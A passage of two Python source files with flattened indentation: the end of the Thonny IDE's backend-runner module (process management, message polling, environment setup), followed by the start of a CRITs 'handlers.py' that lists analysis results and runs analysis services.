# "RUNNER GOT: %s, %s in state: %s", msg.event_type, msg, self.get_state()
# )
msg_count += 1
except BackendTerminatedError as exc:
self._report_backend_crash(exc)
self.destroy_backend()
return False
if msg.get("SystemExit", False):
self.restart_backend(True)
return False
# change state
if isinstance(msg, ToplevelResponse):
self._set_state("waiting_toplevel_command")
elif isinstance(msg, DebuggerResponse):
self._set_state("waiting_debugger_command")
elif isinstance(msg, InlineResponse):
# next inline command won't be sent before response from the last has arrived
self._proxy.running_inline_command = False
else:
"other messages don't affect the state"
# Publish the event
# NB! This may cause another command to be sent before we get to postponed commands.
try:
self._publishing_events = True
class_event_type = type(msg).__name__
get_workbench().event_generate(class_event_type, event=msg) # more general event
if msg.event_type != class_event_type:
# more specific event
get_workbench().event_generate(msg.event_type, event=msg)
finally:
self._publishing_events = False
# TODO: is it necessary???
# https://stackoverflow.com/a/13520271/261181
# get_workbench().update()
self._send_postponed_commands()
def _report_backend_crash(self, exc: Exception) -> None:
returncode = getattr(exc, "returncode", "?")
err = "Backend terminated or disconnected."
try:
faults_file = os.path.join(THONNY_USER_DIR, "backend_faults.log")
if os.path.exists(faults_file):
with open(faults_file, encoding="ASCII") as fp:
err += fp.read()
except Exception:
logger.exception("Failed retrieving backend faults")
err = err.strip() + " Use 'Stop/Restart' to restart.\n"
if returncode != EXPECTED_TERMINATION_CODE:
get_workbench().event_generate("ProgramOutput", stream_name="stderr", data="\n" + err)
get_workbench().become_active_window(False)
def restart_backend(self, clean: bool, first: bool = False, wait: float = 0) -> None:
"""Recreate (or replace) backend proxy / backend process."""
if not first:
get_shell().restart()
get_shell().update_idletasks()
self.destroy_backend()
backend_name = get_workbench().get_option("run.backend_name")
if backend_name not in get_workbench().get_backends():
raise UserError(
"Can't find backend '{}'. Please select another backend from options".format(
backend_name
)
)
backend_class = get_workbench().get_backends()[backend_name].proxy_class
self._set_state("running")
self._proxy = None
self._proxy = backend_class(clean)
self._poll_backend_messages()
if wait:
start_time = time.time()
while not self.is_waiting_toplevel_command() and time.time() - start_time <= wait:
# self._pull_backend_messages()
get_workbench().update()
sleep(0.01)
get_workbench().event_generate("BackendRestart", full=True)
def destroy_backend(self) -> None:
if self._polling_after_id is not None:
get_workbench().after_cancel(self._polling_after_id)
self._polling_after_id = None
self._postponed_commands = []
if self._proxy:
self._proxy.destroy()
self._proxy = None
get_workbench().event_generate("BackendTerminated")
def get_local_executable(self) -> Optional[str]:
if self._proxy is None:
return None
else:
return self._proxy.get_local_executable()
def get_backend_proxy(self) -> "BackendProxy":
return self._proxy
def _check_alloc_console(self) -> None:
if sys.executable.endswith("pythonw.exe"):
# These don't have console allocated.
# Console is required for sending interrupts.
# AllocConsole would be easier but flashes console window
import ctypes
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
exe = sys.executable.replace("pythonw.exe", "python.exe")
cmd = [exe, "-c", "print('Hi!'); input()"]
child = subprocess.Popen(
cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
child.stdout.readline()
result = kernel32.AttachConsole(child.pid)
if not result:
err = ctypes.get_last_error()
logger.info("Could not allocate console. Error code: " + str(err))
child.stdin.write(b"\n")
try:
child.stdin.flush()
except Exception:
# May happen eg. when installation path has "&" in it
# See https://bitbucket.org/plas/thonny/issues/508/cant-allocate-windows-console-when
# Without flush the console window becomes visible, but Thonny can be still used
logger.exception("Problem with finalizing console allocation")
def ready_for_remote_file_operations(self, show_message=False):
if not self._proxy or not self.supports_remote_files():
return False
ready = self._proxy.ready_for_remote_file_operations()
if not ready and show_message:
if not self._proxy.is_connected():
msg = "Device is not connected"
else:
msg = (
"Device is busy -- can't perform this action now."
+ "\nPlease wait or cancel current work and try again!"
)
messagebox.showerror("Can't complete", msg, master=get_workbench())
return ready
def get_supported_features(self) -> Set[str]:
if self._proxy is None:
return set()
else:
return self._proxy.get_supported_features()
def supports_remote_files(self):
if self._proxy is None:
return False
else:
return self._proxy.supports_remote_files()
def supports_remote_directories(self):
if self._proxy is None:
return False
else:
return self._proxy.supports_remote_directories()
def get_node_label(self):
if self._proxy is None:
return "Back-end"
else:
return self._proxy.get_node_label()
def using_venv(self) -> bool:
from thonny.plugins.cpython import CPythonProxy
return isinstance(self._proxy, CPythonProxy) and self._proxy._in_venv
class BackendProxy:
"""Communicates with backend process.
All communication methods must be non-blocking,
ie. suitable for calling from GUI thread."""
# backend_name will be overwritten on Workbench.add_backend
# Subclasses don't need to worry about it.
backend_name = None
backend_description = None
def __init__(self, clean: bool) -> None:
"""Initializes (or starts the initialization of) the backend process.
Backend is considered ready when the runner gets a ToplevelResponse
with attribute "welcome_text" from fetch_next_message.
"""
self.running_inline_command = False
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
raise NotImplementedError()
def send_program_input(self, data: str) -> None:
"""Send input data to backend"""
raise NotImplementedError()
def fetch_next_message(self):
"""Read next message from the queue or None if queue is empty"""
raise NotImplementedError()
def run_script_in_terminal(self, script_path, args, interactive, keep_open):
raise NotImplementedError()
def get_sys_path(self):
"backend's sys.path"
return []
def get_backend_name(self):
return type(self).backend_name
def get_pip_gui_class(self):
return None
def interrupt(self):
"""Tries to interrupt current command without resetting the backend"""
pass
def destroy(self):
"""Called when Thonny no longer needs this instance
(Thonny gets closed or new backend gets selected)
"""
pass
def is_connected(self):
return True
def get_local_executable(self):
"""Return system command for invoking current interpreter"""
return None
def get_supported_features(self):
return {"run"}
def get_node_label(self):
"""Used as files caption if back-end has separate files"""
return "Back-end"
def get_full_label(self):
"""Used in pip GUI title"""
return self.get_node_label()
def supports_remote_files(self):
"""Whether remote file browser should be presented with this back-end"""
return False
def uses_local_filesystem(self):
"""Whether it runs code from local files"""
return True
def supports_remote_directories(self):
return False
def supports_trash(self):
return True
def can_run_remote_files(self):
raise NotImplementedError()
def can_run_local_files(self):
raise NotImplementedError()
def ready_for_remote_file_operations(self):
return False
def get_cwd(self):
return None
def get_clean_description(self):
return self.backend_description
@classmethod
def get_current_switcher_configuration(cls):
"""returns the dict of configuration entries that distinguish current backend conf from other
items in the backend switcher"""
return {"run.backend_name": cls.backend_name}
@classmethod
def get_switcher_entries(cls):
"""
Each returned entry creates one item in the backend switcher menu.
"""
return [(cls.get_current_switcher_configuration(), cls.backend_description)]
def has_custom_system_shell(self):
return False
def open_custom_system_shell(self):
raise NotImplementedError()
class SubprocessProxy(BackendProxy):
def __init__(self, clean: bool, executable: Optional[str] = None) -> None:
super().__init__(clean)
if executable:
self._executable = executable
else:
self._executable = get_interpreter_for_subprocess()
if ".." in self._executable:
self._executable = os.path.normpath(self._executable)
if not os.path.isfile(self._executable):
raise UserError(
"Interpreter '%s' does not exist. Please check the configuration!"
% self._executable
)
self._welcome_text = ""
self._proc = None
self._terminated_readers = 0
self._response_queue = None
self._sys_path = []
self._usersitepackages = None
self._gui_update_loop_id = None
self._in_venv = None
self._cwd = self._get_initial_cwd() # pylint: disable=assignment-from-none
self._start_background_process(clean=clean)
def _get_initial_cwd(self):
return None
def _get_environment(self):
env = get_environment_for_python_subprocess(self._executable)
# variables controlling communication with the back-end process
env["PYTHONIOENCODING"] = "utf-8"
# because cmd line option -u won't reach child processes
# see https://github.com/thonny/thonny/issues/808
env["PYTHONUNBUFFERED"] = "1"
# Let back-end know about plug-ins
env["THONNY_USER_DIR"] = THONNY_USER_DIR
env["THONNY_FRONTEND_SYS_PATH"] = repr(sys.path)
env["THONNY_LANGUAGE"] = get_workbench().get_option("general.language")
if thonny.in_debug_mode():
env["THONNY_DEBUG"] = "1"
elif "THONNY_DEBUG" in env:
del env["THONNY_DEBUG"]
return env
def _start_background_process(self, clean=None, extra_args=[]):
# deque, because in one occasion I need to put messages back
self._response_queue = collections.deque()
if not os.path.exists(self._executable):
raise UserError(
"Interpreter (%s) not found. Please recheck corresponding option!"
% self._executable
)
cmd_line = (
[
self._executable,
"-u", # unbuffered IO
"-B", # don't write pyo/pyc files
# (to avoid problems when using different Python versions without write permissions)
]
+ self._get_launcher_with_args()
+ extra_args
)
creationflags = 0
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
debug("Starting the backend: %s %s", cmd_line, get_workbench().get_local_cwd())
extra_params = {}
if sys.version_info >= (3, 6):
extra_params["encoding"] = "utf-8"
self._proc = subprocess.Popen(
cmd_line,
bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self._get_launch_cwd(),
env=self._get_environment(),
universal_newlines=True,
creationflags=creationflags,
**extra_params,
)
# setup asynchronous output listeners
self._terminated_readers = 0
Thread(target=self._listen_stdout, args=(self._proc.stdout,), daemon=True).start()
Thread(target=self._listen_stderr, args=(self._proc.stderr,), daemon=True).start()
def _get_launch_cwd(self):
return self.get_cwd() if self.uses_local_filesystem() else None
def _get_launcher_with_args(self):
raise NotImplementedError()
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
if isinstance(cmd, ToplevelCommand) and cmd.name[0].isupper():
self._clear_environment()
if isinstance(cmd, ToplevelCommand):
# required by SshCPythonBackend for creating fresh target process
cmd["expected_cwd"] = self._cwd
method_name = "_cmd_" + cmd.name
if hasattr(self, method_name):
getattr(self, method_name)(cmd)
else:
self._send_msg(cmd)
def _send_msg(self, msg):
if not self._proc:
logger.warning("Ignoring command without active backend process")
return
self._proc.stdin.write(serialize_message(msg) + "\n")
self._proc.stdin.flush()
def _clear_environment(self):
pass
def send_program_input(self, data):
self._send_msg(InputSubmission(data))
def process_is_alive(self):
return self._proc is not None and self._proc.poll() is None
def is_terminated(self):
return not self.process_is_alive()
def is_connected(self):
return self.process_is_alive()
def get_sys_path(self):
return self._sys_path
def destroy(self):
self._close_backend()
def _close_backend(self):
if self._proc is not None and self._proc.poll() is None:
self._proc.kill()
self._proc = None
self._response_queue = None
def _listen_stdout(self, stdout):
# debug("... started listening to stdout")
# will be called from separate thread
# allow self._response_queue to be replaced while processing
message_queue = self._response_queue
def publish_as_msg(data):
msg = parse_message(data)
if "cwd" in msg:
self.cwd = msg["cwd"]
message_queue.append(msg)
if len(message_queue) > 10:
# Probably backend runs an infinite/long print loop.
# Throttle message throughput in order to keep GUI thread responsive.
while len(message_queue) > 0:
sleep(0.005)
while True:
try:
data = read_one_incoming_message_str(stdout.readline)
except IOError:
sleep(0.1)
continue
# debug("... read some stdout data", repr(data))
if data == "":
break
else:
try:
publish_as_msg(data)
except Exception:
# Can mean the line was from subprocess,
# which can't be captured by stream faking.
# NB! If subprocess printed it without linebreak,
# then the suffix can be thonny message
parts = data.rsplit(common.MESSAGE_MARKER, maxsplit=1)
# print first part as it is
message_queue.append(
BackendEvent("ProgramOutput", data=parts[0], stream_name="stdout")
)
if len(parts) == 2:
second_part = common.MESSAGE_MARKER + parts[1]
try:
publish_as_msg(second_part)
except Exception:
# just print ...
message_queue.append(
BackendEvent(
"ProgramOutput", data=second_part, stream_name="stdout"
)
)
self._terminated_readers += 1
def _listen_stderr(self, stderr):
# stderr is used only for debugger debugging
while True:
data = read_one_incoming_message_str(stderr.readline)
if data == "":
break
else:
self._response_queue.append(
BackendEvent("ProgramOutput", stream_name="stderr", data=data)
)
self._terminated_readers += 1
def _store_state_info(self, msg):
if "cwd" in msg:
self._cwd = msg["cwd"]
self._publish_cwd(msg["cwd"])
if msg.get("welcome_text"):
self._welcome_text = msg["welcome_text"]
if "in_venv" in msg:
self._in_venv = msg["in_venv"]
if "sys_path" in msg:
self._sys_path = msg["sys_path"]
if "usersitepackages" in msg:
self._usersitepackages = msg["usersitepackages"]
if "prefix" in msg:
self._sys_prefix = msg["prefix"]
if "exe_dirs" in msg:
self._exe_dirs = msg["exe_dirs"]
if msg.get("executable"):
self._reported_executable = msg["executable"]
def _publish_cwd(self, cwd):
if self.uses_local_filesystem():
get_workbench().set_local_cwd(cwd)
def get_supported_features(self):
return {"run"}
def get_site_packages(self):
# NB! site.sitepackages may not be present in virtualenv
for d in self._sys_path:
if ("site-packages" in d or "dist-packages" in d) and path_startswith(
d, self._sys_prefix
):
return d
return None
def get_user_site_packages(self):
return self._usersitepackages
def get_cwd(self):
return self._cwd
def get_exe_dirs(self):
return self._exe_dirs
def fetch_next_message(self):
if not self._response_queue or len(self._response_queue) == 0:
if self.is_terminated() and self._terminated_readers == 2:
raise BackendTerminatedError(self._proc.returncode if self._proc else None)
else:
return None
msg = self._response_queue.popleft()
self._store_state_info(msg)
if msg.event_type == "ProgramOutput":
# combine available small output messages to one single message,
# in order to put less pressure on UI code
wait_time = 0.01
total_wait_time = 0
while True:
if len(self._response_queue) == 0:
if _ends_with_incomplete_ansi_code(msg["data"]) and total_wait_time < 0.1:
# Allow reader to send the remaining part
sleep(wait_time)
total_wait_time += wait_time
continue
else:
return msg
else:
next_msg = self._response_queue.popleft()
if (
next_msg.event_type == "ProgramOutput"
and next_msg["stream_name"] == msg["stream_name"]
and (
len(msg["data"]) + len(next_msg["data"]) <= OUTPUT_MERGE_THRESHOLD
and ("\n" not in msg["data"] or not io_animation_required)
or _ends_with_incomplete_ansi_code(msg["data"])
)
):
msg["data"] += next_msg["data"]
else:
# not to be sent in the same block, put it back
self._response_queue.appendleft(next_msg)
return msg
else:
return msg
def _ends_with_incomplete_ansi_code(data):
pos = data.rfind("\033")
if pos == -1:
return False
# note ANSI_CODE_TERMINATOR also includes [
params_and_terminator = data[pos + 2 :]
return not ANSI_CODE_TERMINATOR.search(params_and_terminator)
def is_bundled_python(executable):
return os.path.exists(os.path.join(os.path.dirname(executable), "thonny_python.ini"))
def create_backend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. pip) on CPython backend.
Assumes current backend is CPython."""
# TODO: if backend == frontend, then delegate to create_frontend_python_process
python_exe = get_runner().get_local_executable()
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
# TODO: remove frontend python from path and add backend python to it
return _create_python_process(python_exe, args, stdin, stdout, stderr, env=env)
def create_frontend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. for installing plug-ins on by the plug-ins)"""
if _console_allocated:
python_exe = get_interpreter_for_subprocess().replace("pythonw.exe", "python.exe")
else:
python_exe = get_interpreter_for_subprocess().replace("python.exe", "pythonw.exe")
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
return _create_python_process(python_exe, args, stdin, stdout, stderr)
def _create_python_process(
python_exe,
args,
stdin=None,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=False,
env=None,
universal_newlines=True,
):
cmd = [python_exe] + args
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
startupinfo = None
creationflags = 0
proc = subprocess.Popen(
cmd,
stdin=stdin,
stdout=stdout,
stderr=stderr,
shell=shell,
env=env,
universal_newlines=universal_newlines,
startupinfo=startupinfo,
creationflags=creationflags,
)
proc.cmd = cmd
return proc
class BackendTerminatedError(Exception):
def __init__(self, returncode=None):
Exception.__init__(self)
self.returncode = returncode
def is_venv_interpreter_of_current_interpreter(executable):
for location in ["..", "."]:
cfg_path = os.path.join(os.path.dirname(executable), location, "pyvenv.cfg")
if os.path.isfile(cfg_path):
with open(cfg_path) as fp:
content = fp.read()
for line in content.splitlines():
if line.replace(" ", "").startswith("home="):
_, home = line.split("=", maxsplit=1)
home = home.strip()
if os.path.isdir(home) and (
is_same_path(home, sys.prefix)
or is_same_path(home, os.path.join(sys.prefix, "bin"))
or is_same_path(home, os.path.join(sys.prefix, "Scripts"))
):
return True
return False
def get_environment_for_python_subprocess(target_executable):
overrides = get_environment_overrides_for_python_subprocess(target_executable)
return get_environment_with_overrides(overrides)
def get_environment_with_overrides(overrides):
env = os.environ.copy()
for key in overrides:
if overrides[key] is None and key in env:
del env[key]
else:
assert isinstance(overrides[key], str)
if key.upper() == "PATH":
update_system_path(env, overrides[key])
else:
env[key] = overrides[key]
return env
def get_environment_overrides_for_python_subprocess(target_executable):
"""Take care of not not confusing different interpreter
with variables meant for bundled interpreter"""
# At the moment I'm tweaking the environment only if current
# exe is bundled for Thonny.
# In remaining cases it is user's responsibility to avoid
# calling Thonny with environment which may be confusing for
# different Pythons called in a subprocess.
this_executable = sys.executable.replace("pythonw.exe", "python.exe")
target_executable = target_executable.replace("pythonw.exe", "python.exe")
interpreter_specific_keys = [
"TCL_LIBRARY",
"TK_LIBRARY",
"LD_LIBRARY_PATH",
"DYLD_LIBRARY_PATH",
"SSL_CERT_DIR",
"SSL_CERT_FILE",
"PYTHONHOME",
"PYTHONPATH",
"PYTHONNOUSERSITE",
"PYTHONUSERBASE",
]
result = {}
if os.path.samefile(
target_executable, this_executable
) or is_venv_interpreter_of_current_interpreter(target_executable):
# bring out some important variables so that they can
# be explicitly set in macOS Terminal
# (If they are set then it's most likely because current exe is in Thonny bundle)
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = os.environ[key]
# never pass some variables to different interpreter
# (even if it's venv or symlink to current one)
if not is_same_path(target_executable, this_executable):
for key in ["PYTHONPATH", "PYTHONHOME", "PYTHONNOUSERSITE", "PYTHONUSERBASE"]:
if key in os.environ:
result[key] = None
else:
# interpreters are not related
# interpreter specific keys most likely would confuse other interpreter
for key in interpreter_specific_keys:
if key in os.environ:
result[key] = None
# some keys should be never passed
for key in [
"PYTHONSTARTUP",
"PYTHONBREAKPOINT",
"PYTHONDEBUG",
"PYTHONNOUSERSITE",
"PYTHONASYNCIODEBUG",
]:
if key in os.environ:
result[key] = None
# venv may not find (correct) Tk without assistance (eg. in Ubuntu)
if is_venv_interpreter_of_current_interpreter(target_executable):
try:
if "TCL_LIBRARY" not in os.environ or "TK_LIBRARY" not in os.environ:
result["TCL_LIBRARY"] = get_workbench().tk.exprstring("$tcl_library")
result["TK_LIBRARY"] = get_workbench().tk.exprstring("$tk_library")
except Exception:
logger.exception("Can't compute Tcl/Tk library location")
return result
def construct_cd_command(path) -> str:
return construct_cmd_line(["%cd", path])
_command_id_counter = 0
def generate_command_id():
global _command_id_counter
_command_id_counter += 1
return "cmd_" + str(_command_id_counter)
class InlineCommandDialog(WorkDialog):
def __init__(
self,
master,
cmd: Union[InlineCommand, Callable],
title,
instructions=None,
output_prelude=None,
autostart=True,
):
self.response = None
self._title = title
self._instructions = instructions
self._cmd = cmd
self.returncode = None
get_shell().set_ignore_program_output(True)
get_workbench().bind("InlineResponse", self._on_response, True)
get_workbench().bind("InlineProgress", self._on_progress, True)
get_workbench().bind("ProgramOutput", self._on_output, True)
super().__init__(master, autostart=autostart)
if output_prelude:
self.append_text(output_prelude)
def get_title(self):
return self._title
def get_instructions(self) -> Optional[str]:
return self._instructions or self._cmd.get("description", "Working...")
def _on_response(self, response):
if response.get("command_id") == getattr(self._cmd, "id"):
logger.debug("Dialog got response: %s", response)
self.response = response
self.returncode = response.get("returncode", None)
success = (
not self.returncode and not response.get("error") and not response.get("errors")
)
if success:
self.set_action_text("Done!")
else:
self.set_action_text("Error")
if response.get("error"):
self.append_text("Error %s\n" % response["error"], stream_name="stderr")
if response.get("errors"):
self.append_text("Errors %s\n" % response["errors"], stream_name="stderr")
if self.returncode:
self.append_text(
"Process returned with code %s\n" % self.returncode, stream_name="stderr"
)
self.report_done(success)
def _on_progress(self, msg):
if msg.get("command_id") != getattr(self._cmd, "id"):
return
if msg.get("value", None) is not None and msg.get("maximum", None) is not None:
self.report_progress(msg["value"], msg["maximum"])
if msg.get("description"):
self.set_action_text(msg["description"])
def _on_output(self, msg):
stream_name = msg.get("stream_name", "stdout")
self.append_text(msg["data"], stream_name)
self.set_action_text_smart(msg["data"])
def start_work(self):
self.send_command_to_backend()
def send_command_to_backend(self):
if not isinstance(self._cmd, CommandToBackend):
# it was a lazy definition
try:
self._cmd = self._cmd()
except Exception as e:
logger.error("Could not produce command for backend", self._cmd)
self.set_action_text("Error!")
self.append_text("Could not produce command for backend\n")
self.append_text("".join(traceback.format_exc()) + "\n")
self.report_done(False)
return
logger.debug("Starting command in dialog: %s", self._cmd)
get_runner().send_command(self._cmd)
def cancel_work(self):
super(InlineCommandDialog, self).cancel_work()
get_runner()._cmd_interrupt()
def close(self):
get_workbench().unbind("InlineResponse", self._on_response)
get_workbench().unbind("InlineProgress", self._on_progress)
super(InlineCommandDialog, self).close()
get_shell().set_ignore_program_output(False)
def get_frontend_python():
# TODO: deprecated (name can be misleading)
warnings.warn("get_frontend_python is deprecated")
return get_interpreter_for_subprocess(sys.executable)
def get_interpreter_for_subprocess(candidate=None):
if candidate is None:
candidate = sys.executable
pythonw = candidate.replace("python.exe", "pythonw.exe")
if not _console_allocated and os.path.exists(pythonw):
return pythonw
else:
return candidate.replace("pythonw.exe", "python.exe")
|
handlers.py
|
import ast
import datetime
import json
import logging
import copy
from django.http import HttpResponse
from multiprocessing import Process
from threading import Thread, local
try:
from mongoengine.base import ValidationError
except ImportError:
from mongoengine.errors import ValidationError
from multiprocessing.pool import Pool, ThreadPool
from django.core.urlresolvers import reverse
from django.conf import settings
from django.shortcuts import render_to_response
from django.template import RequestContext
import crits.services
from crits.core.class_mapper import class_from_type, class_from_id
from crits.core.crits_mongoengine import json_handler
from crits.core.handlers import build_jtable, csv_export
from crits.core.handlers import jtable_ajax_list, jtable_ajax_delete
from crits.core.user_tools import user_sources
from crits.services.analysis_result import AnalysisResult, AnalysisConfig
from crits.services.analysis_result import EmbeddedAnalysisResultLog
from crits.services.core import ServiceConfigError, AnalysisTask
from crits.services.service import CRITsService
logger = logging.getLogger(__name__)
def generate_analysis_results_csv(request):
"""
Generate a CSV file of the Analysis Results information
:param request: The request for this CSV.
:type request: :class:`django.http.HttpRequest`
:returns: :class:`django.http.HttpResponse`
"""
response = csv_export(request,AnalysisResult)
return response
def generate_analysis_results_jtable(request, option):
"""
Generate the jtable data for rendering in the list template.
:param request: The request for this jtable.
:type request: :class:`django.http.HttpRequest`
:param option: Action to take.
:type option: str of either 'jtlist', 'jtdelete', or 'inline'.
:returns: :class:`django.http.HttpResponse`
"""
obj_type = AnalysisResult
type_ = "analysis_result"
mapper = obj_type._meta['jtable_opts']
if option == "jtlist":
# Sets display url
details_url = mapper['details_url']
details_url_key = mapper['details_url_key']
fields = mapper['fields']
response = jtable_ajax_list(obj_type,
details_url,
details_url_key,
request,
includes=fields)
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
if option == "jtdelete":
response = {"Result": "ERROR"}
if jtable_ajax_delete(obj_type,request):
response = {"Result": "OK"}
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
jtopts = {
'title': "Analysis Results",
'default_sort': mapper['default_sort'],
'listurl': reverse('crits.services.views.%ss_listing' % type_,
args=('jtlist',)),
'deleteurl': reverse('crits.services.views.%ss_listing' % type_,
args=('jtdelete',)),
'searchurl': reverse(mapper['searchurl']),
'fields': mapper['jtopts_fields'],
'hidden_fields': mapper['hidden_fields'],
'linked_fields': mapper['linked_fields'],
'details_link': mapper['details_link'],
'no_sort': mapper['no_sort']
}
jtable = build_jtable(jtopts,request)
jtable['toolbar'] = [
]
if option == "inline":
return render_to_response("jtable.html",
{'jtable': jtable,
'jtid': '%s_listing' % type_,
'button' : '%ss_tab' % type_},
RequestContext(request))
else:
return render_to_response("%s_listing.html" % type_,
{'jtable': jtable,
'jtid': '%s_listing' % type_},
RequestContext(request))
def service_work_handler(service_instance, final_config):
"""
Handles a unit of work for a service by calling the service's "execute"
method. This function is generally called by processes/threads. Also
this function is needed because it is picklable and passing in the
service_instance.execute method is not picklable because it is an
instance method.
:param service_instance: The service instance that the work will be performed in
:type service_instance: crits.services.core.Service
:param service_instance: The service's configuration settings
:type service_instance: dict
"""
service_instance.execute(final_config)
def run_service(name, type_, id_, user, obj=None,
execute='local', custom_config={}, **kwargs):
"""
Run a service.
:param name: The name of the service to run.
:type name: str
:param type_: The type of the object.
:type type_: str
:param id_: The identifier of the object.
:type id_: str
:param user: The user running the service.
:type user: str
:param obj: The CRITs object, if given this overrides crits_type and identifier.
:type obj: CRITs object.
:param analyst: The user updating the results.
:type analyst: str
:param execute: The execution type.
:type execute: str
:param custom_config: Use a custom configuration for this run.
:type custom_config: dict
"""
result = {'success': False}
if type_ not in settings.CRITS_TYPES:
result['html'] = "Unknown CRITs type."
return result
if name not in enabled_services():
result['html'] = "Service %s is unknown or not enabled." % name
return result
service_class = crits.services.manager.get_service_class(name)
if not service_class:
result['html'] = "Unable to get service class."
return result
if not obj:
obj = class_from_id(type_, id_)
if not obj:
result['html'] = 'Could not find object.'
return result
service = CRITsService.objects(name=name).first()
if not service:
result['html'] = "Unable to find service in database."
return result
# See if the object is a supported type for the service.
if not service_class.supported_for_type(type_):
result['html'] = "Service not supported for type '%s'" % type_
return result
# When running in threaded mode, each thread needs to have its own copy of
# the object. If we do not do this then one thread may read() from the
# object (to get the binary) and then the second would would read() without
# knowing and get undefined behavior as the file pointer would be who knows
# where. By giving each thread a local copy they can operate independently.
#
# When not running in thread mode this has no effect except wasted memory.
local_obj = local()
local_obj.obj = copy.deepcopy(obj)
# Give the service a chance to check for required fields.
try:
service_class.valid_for(local_obj.obj)
if hasattr(local_obj.obj, 'filedata'):
if local_obj.obj.filedata.grid_id:
# Reset back to the start so the service gets the full file.
local_obj.obj.filedata.seek(0)
except ServiceConfigError as e:
result['html'] = str(e)
return result
# Get the config from the database and validate the submitted options
# exist.
db_config = service.config.to_dict()
try:
service_class.validate_runtime(custom_config, db_config)
except ServiceConfigError as e:
result['html'] = str(e)
return result
final_config = db_config
# Merge the submitted config with the one from the database.
# This is because not all config options may be submitted.
final_config.update(custom_config)
form = service_class.bind_runtime_form(user, final_config)
if form:
if not form.is_valid():
# TODO: return corrected form via AJAX
result['html'] = str(form.errors)
return result
# If the form is valid, create the config using the cleaned data.
final_config = db_config
final_config.update(form.cleaned_data)
logger.info("Running %s on %s, execute=%s" % (name, local_obj.obj.id, execute))
service_instance = service_class(notify=update_analysis_results,
complete=finish_task)
# Give the service a chance to modify the config that gets saved to the DB.
saved_config = dict(final_config)
service_class.save_runtime_config(saved_config)
task = AnalysisTask(local_obj.obj, service_instance, user)
task.config = AnalysisConfig(**saved_config)
task.start()
add_task(task)
service_instance.set_task(task)
if execute == 'process':
p = Process(target=service_instance.execute, args=(final_config,))
p.start()
elif execute == 'thread':
t = Thread(target=service_instance.execute, args=(final_config,))
t.start()
elif execute == 'process_pool':
if __service_process_pool__ is not None and service.compatability_mode != True:
__service_process_pool__.apply_async(func=service_work_handler,
args=(service_instance, final_config,))
else:
logger.warning("Could not run %s on %s, execute=%s, running in process mode" % (name, local_obj.obj.id, execute))
p = Process(target=service_instance.execute, args=(final_config,))
p.start()
elif execute == 'thread_pool':
if __service_thread_pool__ is not None and service.compatability_mode != True:
__service_thread_pool__.apply_async(func=service_work_handler,
args=(service_instance, final_config,))
else:
logger.warning("Could not run %s on %s, execute=%s, running in thread mode" % (name, local_obj.obj.id, execute))
t = Thread(target=service_instance.execute, args=(final_config,))
t.start()
elif execute == 'local':
service_instance.execute(final_config)
# Return after starting thread so web request can complete.
result['success'] = True
return result
def add_task(task):
"""
Add a new task.
"""
logger.debug("Adding task %s" % task)
insert_analysis_results(task)
def run_triage(obj, user):
"""
Run all services marked as triage against this top-level object.
:param obj: The CRITs top-level object class.
:type obj: Class which inherits from
:class:`crits.core.crits_mongoengine.CritsBaseAttributes`
:param user: The user requesting the services to be run.
:type user: str
"""
services = triage_services()
for service_name in services:
try:
run_service(service_name,
obj._meta['crits_type'],
obj.id,
user,
obj=obj,
execute=settings.SERVICE_MODEL,
custom_config={})
except:
pass
return
def add_result(object_type, object_id, analysis_id, result, type_, subtype,
analyst):
"""
add_results wrapper for a single result.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param result: The result to append.
:type result: str
:param type_: The result type.
:type type_: str
:param subtype: The result subtype.
:type subtype: str
:param analyst: The user updating the results.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
return add_results(object_type, object_id, analysis_id, [result], [type_],
[subtype], analyst)
def add_results(object_type, object_id, analysis_id, result, type_, subtype,
analyst):
"""
Add multiple results to an analysis task.
:param object_type: The top-level object type.
:type object_type: str
:param object_id: The ObjectId to search for.
:type object_id: str
:param analysis_id: The ID of the task to update.
:type analysis_id: str
:param result: The list of result to append.
:type result: list of str
:param type_: The list of result types.
:type type_: list of str
:param subtype: The list of result subtypes.
:type subtype: list of str
:param analyst: The user updating the results.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str) if failed.
"""
res = {'success': False}
if not object_type or not object_id or not analysis_id:
res['message'] = "Must supply object id/type and analysis id."
return res
# Validate user can add service results to this TLO.
klass = class_from_type(object_type)
sources = user_sources(analyst)
obj = klass.objects(id=object_id, source__name__in=sources).first()
if not obj:
res['message'] = "Could not find object to add results to."
return res
if not(result and type_ and subtype):
res['message'] = "Need a result, type, and subtype to add a result."
return res
if not(len(result) == len(type_) == len(subtype)):
res['message'] = "result, type, and subtype need to be the same length."
return res
# Update analysis results
final_list = []
for key, r in enumerate(result):
final = {}
final['subtype'] = subtype[key]
final['result'] = r
tmp = ast.literal_eval(type_[key])
for k in tmp:
final[k] = tmp[k]
final_list.append(final)
ar = AnalysisResult.objects(analysis_id=analysis_id).first()
